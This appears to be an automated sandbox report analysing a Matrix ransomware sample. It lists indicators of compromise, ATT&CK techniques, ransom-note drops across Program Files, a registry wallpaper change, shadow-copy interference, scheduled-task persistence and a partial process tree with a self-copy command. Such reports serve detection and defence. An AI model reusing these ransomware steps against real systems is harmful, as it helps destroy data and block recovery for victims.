File opened for modification	C:\Users\Admin\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

hbFC3HC764.exe67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened (read-only)	\??\T:	hbFC3HC764.exe
File opened (read-only)	\??\U:	hbFC3HC764.exe
File opened (read-only)	\??\W:	hbFC3HC764.exe
File opened (read-only)	\??\A:	hbFC3HC764.exe
File opened (read-only)	\??\M:	hbFC3HC764.exe
File opened (read-only)	\??\R:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\H:	hbFC3HC764.exe
File opened (read-only)	\??\Z:	hbFC3HC764.exe
File opened (read-only)	\??\Z:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\U:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\I:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\G:	hbFC3HC764.exe
File opened (read-only)	\??\K:	hbFC3HC764.exe
File opened (read-only)	\??\R:	hbFC3HC764.exe
File opened (read-only)	\??\S:	hbFC3HC764.exe
File opened (read-only)	\??\Y:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\X:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\X:	hbFC3HC764.exe
File opened (read-only)	\??\Y:	hbFC3HC764.exe
File opened (read-only)	\??\O:	hbFC3HC764.exe
File opened (read-only)	\??\K:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	hbFC3HC764.exe
File opened (read-only)	\??\L:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\H:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\S:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\N:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\M:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\G:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\E:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\B:	hbFC3HC764.exe
File opened (read-only)	\??\E:	hbFC3HC764.exe
File opened (read-only)	\??\I:	hbFC3HC764.exe
File opened (read-only)	\??\W:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\Q:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\V:	hbFC3HC764.exe
File opened (read-only)	\??\L:	hbFC3HC764.exe
File opened (read-only)	\??\P:	hbFC3HC764.exe
File opened (read-only)	\??\P:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\O:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\J:	hbFC3HC764.exe
File opened (read-only)	\??\V:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\T:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\Q:	hbFC3HC764.exe
File opened (read-only)	\??\J:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\N:	hbFC3HC764.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 myexternalip.com

flow	ioc
10	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\YnGIlPbI.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\icudtl.dat	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\server\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\hr.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.165.21\MicrosoftEdgeUpdateSetup_X86_1.3.165.21.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Extensions\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_proxy.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\hu.pak	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-explorer.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Staging	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkDrop32x32.gif	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\skin.catalog	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\README.txt	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\java-rmi.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\bg.pak	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightRegular.ttf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jjs.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220812190431.pma	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_zh_CN.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ms.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\MicrosoftEdgeUpdateCore.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\autofill_labeling_features_email.txt.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5044 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4724 vssadmin.exe

pid	process
5044	schtasks.exe

pid	process
4724	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exehbFC3HC764.exe

pid	process
4184	powershell.exe
4184	powershell.exe
2476	powershell.exe
2476	powershell.exe
4564	hbFC3HC764.exe
4564	hbFC3HC764.exe
4564	hbFC3HC764.exe
4564	hbFC3HC764.exe
4564	hbFC3HC764.exe
4564	hbFC3HC764.exe
4564	hbFC3HC764.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

hbFC3HC764.exe

pid process

4564 hbFC3HC764.exe

pid	process
4564	hbFC3HC764.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetakeown.exehbFC3HC764.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeTakeOwnershipPrivilege	3752	takeown.exe
Token: SeDebugPrivilege	4564	hbFC3HC764.exe
Token: SeLoadDriverPrivilege	4564	hbFC3HC764.exe
Token: SeTakeOwnershipPrivilege	2424	takeown.exe
Token: SeTakeOwnershipPrivilege	4972	takeown.exe
Token: SeTakeOwnershipPrivilege	4840	takeown.exe
Token: SeBackupPrivilege	4100	vssvc.exe
Token: SeRestorePrivilege	4100	vssvc.exe
Token: SeAuditPrivilege	4100	vssvc.exe
Token: SeTakeOwnershipPrivilege	740	takeown.exe
Token: SeTakeOwnershipPrivilege	1740	takeown.exe
Token: SeIncreaseQuotaPrivilege	4812	WMIC.exe
Token: SeSecurityPrivilege	4812	WMIC.exe
Token: SeTakeOwnershipPrivilege	4812	WMIC.exe
Token: SeLoadDriverPrivilege	4812	WMIC.exe
Token: SeSystemProfilePrivilege	4812	WMIC.exe
Token: SeSystemtimePrivilege	4812	WMIC.exe
Token: SeProfSingleProcessPrivilege	4812	WMIC.exe
Token: SeIncBasePriorityPrivilege	4812	WMIC.exe
Token: SeCreatePagefilePrivilege	4812	WMIC.exe
Token: SeBackupPrivilege	4812	WMIC.exe
Token: SeRestorePrivilege	4812	WMIC.exe
Token: SeShutdownPrivilege	4812	WMIC.exe
Token: SeDebugPrivilege	4812	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4812	WMIC.exe
Token: SeRemoteShutdownPrivilege	4812	WMIC.exe
Token: SeUndockPrivilege	4812	WMIC.exe
Token: SeManageVolumePrivilege	4812	WMIC.exe
Token: 33	4812	WMIC.exe
Token: 34	4812	WMIC.exe
Token: 35	4812	WMIC.exe
Token: 36	4812	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4812	WMIC.exe
Token: SeSecurityPrivilege	4812	WMIC.exe
Token: SeTakeOwnershipPrivilege	4812	WMIC.exe
Token: SeLoadDriverPrivilege	4812	WMIC.exe
Token: SeSystemProfilePrivilege	4812	WMIC.exe
Token: SeSystemtimePrivilege	4812	WMIC.exe
Token: SeProfSingleProcessPrivilege	4812	WMIC.exe
Token: SeIncBasePriorityPrivilege	4812	WMIC.exe
Token: SeCreatePagefilePrivilege	4812	WMIC.exe
Token: SeBackupPrivilege	4812	WMIC.exe
Token: SeRestorePrivilege	4812	WMIC.exe
Token: SeShutdownPrivilege	4812	WMIC.exe
Token: SeDebugPrivilege	4812	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4812	WMIC.exe
Token: SeRemoteShutdownPrivilege	4812	WMIC.exe
Token: SeUndockPrivilege	4812	WMIC.exe
Token: SeManageVolumePrivilege	4812	WMIC.exe
Token: 33	4812	WMIC.exe
Token: 34	4812	WMIC.exe
Token: 35	4812	WMIC.exe
Token: 36	4812	WMIC.exe
Token: SeTakeOwnershipPrivilege	2396	takeown.exe
Token: SeTakeOwnershipPrivilege	3896	takeown.exe
Token: SeTakeOwnershipPrivilege	3944	takeown.exe
Token: SeTakeOwnershipPrivilege	4212	takeown.exe
Token: SeTakeOwnershipPrivilege	4868	takeown.exe
Token: SeTakeOwnershipPrivilege	4940	takeown.exe
Token: SeTakeOwnershipPrivilege	4576	takeown.exe
Token: SeTakeOwnershipPrivilege	4268	takeown.exe
Token: SeTakeOwnershipPrivilege	304	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exeNWujmQJJ.execmd.execmd.execmd.execmd.execmd.execmd.exehbFC3HC7.exewscript.execmd.execmd.exe

description	pid	process	target process
PID 4332 wrote to memory of 756	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 756	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 756	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 4148	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWujmQJJ.exe
PID 4332 wrote to memory of 4148	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWujmQJJ.exe
PID 4332 wrote to memory of 4148	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWujmQJJ.exe
PID 4148 wrote to memory of 3592	4148	NWujmQJJ.exe	cmd.exe
PID 4148 wrote to memory of 3592	4148	NWujmQJJ.exe	cmd.exe
PID 4148 wrote to memory of 3592	4148	NWujmQJJ.exe	cmd.exe
PID 3592 wrote to memory of 4184	3592	cmd.exe	powershell.exe
PID 3592 wrote to memory of 4184	3592	cmd.exe	powershell.exe
PID 3592 wrote to memory of 4184	3592	cmd.exe	powershell.exe
PID 4332 wrote to memory of 4828	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 4828	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 4828	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4828 wrote to memory of 2476	4828	cmd.exe	powershell.exe
PID 4828 wrote to memory of 2476	4828	cmd.exe	powershell.exe
PID 4828 wrote to memory of 2476	4828	cmd.exe	powershell.exe
PID 4332 wrote to memory of 1120	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 1120	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 1120	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 1108	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 1108	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 1108	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1120 wrote to memory of 2952	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 2952	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 2952	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4016	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4016	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4016	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4028	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4028	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4028	1120	cmd.exe	reg.exe
PID 1108 wrote to memory of 1740	1108	cmd.exe	wscript.exe
PID 1108 wrote to memory of 1740	1108	cmd.exe	wscript.exe
PID 1108 wrote to memory of 1740	1108	cmd.exe	wscript.exe
PID 4332 wrote to memory of 32	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 32	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4332 wrote to memory of 32	4332	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 32 wrote to memory of 420	32	cmd.exe	cacls.exe
PID 32 wrote to memory of 420	32	cmd.exe	cacls.exe
PID 32 wrote to memory of 420	32	cmd.exe	cacls.exe
PID 32 wrote to memory of 3752	32	cmd.exe	takeown.exe
PID 32 wrote to memory of 3752	32	cmd.exe	takeown.exe
PID 32 wrote to memory of 3752	32	cmd.exe	takeown.exe
PID 32 wrote to memory of 3892	32	cmd.exe	cmd.exe
PID 32 wrote to memory of 3892	32	cmd.exe	cmd.exe
PID 32 wrote to memory of 3892	32	cmd.exe	cmd.exe
PID 3892 wrote to memory of 4540	3892	cmd.exe	hbFC3HC7.exe
PID 3892 wrote to memory of 4540	3892	cmd.exe	hbFC3HC7.exe
PID 3892 wrote to memory of 4540	3892	cmd.exe	hbFC3HC7.exe
PID 4540 wrote to memory of 4564	4540	hbFC3HC7.exe	hbFC3HC764.exe
PID 4540 wrote to memory of 4564	4540	hbFC3HC7.exe	hbFC3HC764.exe
PID 1740 wrote to memory of 2732	1740	wscript.exe	cmd.exe
PID 1740 wrote to memory of 2732	1740	wscript.exe	cmd.exe
PID 1740 wrote to memory of 2732	1740	wscript.exe	cmd.exe
PID 2732 wrote to memory of 5044	2732	cmd.exe	schtasks.exe
PID 2732 wrote to memory of 5044	2732	cmd.exe	schtasks.exe
PID 2732 wrote to memory of 5044	2732	cmd.exe	schtasks.exe
PID 1740 wrote to memory of 1760	1740	wscript.exe	cmd.exe
PID 1740 wrote to memory of 1760	1740	wscript.exe	cmd.exe
PID 1740 wrote to memory of 1760	1740	wscript.exe	cmd.exe
PID 1760 wrote to memory of 5084	1760	cmd.exe	schtasks.exe
PID 1760 wrote to memory of 5084	1760	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
"C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe" "C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe"
  2⤵
  PID:756
- C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe
  "C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe" -n
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Windows\SysWOW64\cmd.exe
